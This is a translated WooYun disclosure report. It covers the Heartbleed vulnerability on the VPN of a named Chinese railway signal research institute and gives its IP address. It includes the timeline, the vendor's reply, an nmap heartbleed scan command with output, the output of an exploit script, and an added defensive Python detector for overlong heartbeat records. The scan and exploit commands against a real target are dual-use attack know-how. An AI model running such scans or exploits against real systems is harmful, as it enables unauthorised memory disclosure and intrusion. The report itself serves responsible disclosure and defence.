
Vulnerability summary

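Bug ID: wooyun-2015-0123191

Title: Heartbleed on a system of a certain railway signal and communication research and design institute due to delayed patching

Vendor: CNCERT (National Internet Emergency Center)

Author: Dolphin

Submitted: 2015-07-03 12:02

Fixed: 2015-08-21 10:08

Published: 2015-08-21 10:08

Vulnerability type: system/service patches not applied in time

Severity: Low

Self-assessed Rank: 5

Status: handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]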


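Vulnerability details

Disclosure status:

2015-07-03: Details sent to the vendor; waiting for the vendor to respond
2015-07-07: Vendor confirmed; details disclosed to the vendor only
2015-07-17: Details disclosed to core white hats and experts in the relevant field
2015-07-27: Details disclosed to regular white hats
2015-08-06: Details disclosed to trainee white hats
2015-08-21: Details disclosed to the public

Brief description:

The VPN of Beijing National Railway Research & Design Institute of Signal & Communication Co., Ltd. (北京全路通信信号研究设计院有限公司) is affected by the Heartbleed vulnerability and leaks some sensitive information.

Detailed description: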

nmap -n -p 443 -Pn --script=ssl-heartbleed 222.35.95.41

Starting Nmap 6.49BETA3 ( https://nmap.org ) at 2015-06-28 02:58 中国标准时间
Nmap scan report for 222.35.95.41
Host is up (0.0040s latency).
PORT STATE SERVICE
443/tcp open https
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| http://cvedetails.com/cve/2014-0160/
|_ http://www.openssl.org/news/secadv_20140407.txt
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds




Proof of vulnerability:

python /root/openSSL.py 222.35.95.41
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 86
... received message: type = 22, ver = 0302, length = 1288
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:


Fix:

Update and upgrade, you know the drill.

Copyright notice: when reposting, please credit the source Dolphin@WooYun
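
The transcript in the report shows a heartbeat record (type 24) of 16384 bytes coming back from the server. As an added example (not part of the original report or of any tool it used), the following Python code flags that pattern in captured TLS streams; the sample streams are constructed from the record sizes in the transcript, and the client record sizes and the 64-byte slack are assumptions.

```python
import struct

HEARTBEAT = 24   # TLS ContentType for heartbeat records (RFC 6520)
SLACK = 64       # assumption: allowance for padding/MAC size differences

def record(ctype, version, length):
    """Constructed record: real 5-byte header, zero-filled body."""
    return struct.pack("!BHH", ctype, version, length) + b"\x00" * length

def parse_records(stream):
    """Split a TLS byte stream into (content_type, version, length) tuples."""
    records, off = [], 0
    while off + 5 <= len(stream):
        ctype, version, length = struct.unpack_from("!BHH", stream, off)
        if off + 5 + length > len(stream):
            break  # truncated capture: stop instead of misparsing
        records.append((ctype, version, length))
        off += 5 + length
    return records

def overlong_heartbeats(client_stream, server_stream):
    """Lengths of server heartbeat records far larger than any client one."""
    sent = [n for t, _, n in parse_records(client_stream) if t == HEARTBEAT]
    limit = max(sent, default=0) + SLACK
    return [n for t, _, n in parse_records(server_stream)
            if t == HEARTBEAT and n > limit]

# Constructed sample streams. Server record sizes follow the transcript
# (86, 1288, 4, then 16384); client sizes are assumed for illustration.
CLIENT = record(22, 0x0302, 220) + record(HEARTBEAT, 0x0302, 19)
VULNERABLE = (record(22, 0x0302, 86) + record(22, 0x0302, 1288) +
              record(22, 0x0302, 4) + record(HEARTBEAT, 0x0302, 16384))
PATCHED_LIKE = (record(22, 0x0302, 86) + record(22, 0x0302, 1288) +
                record(22, 0x0302, 4) + record(HEARTBEAT, 0x0302, 19))

if __name__ == "__main__":
    print("unpatched-like capture:", overlong_heartbeats(CLIENT, VULNERABLE))
    print("patched-like capture:  ", overlong_heartbeats(CLIENT, PATCHED_LIKE))
```

The check uses record headers only, so it works on captures where the record bodies are encrypted.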


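Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-07-07 10:06

Vendor reply:

CNVD has confirmed the situation described and has passed it via CNCERT to the Beijing branch center, which will follow up and coordinate with the organization managing the site to handle it.

Latest status:

None yet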

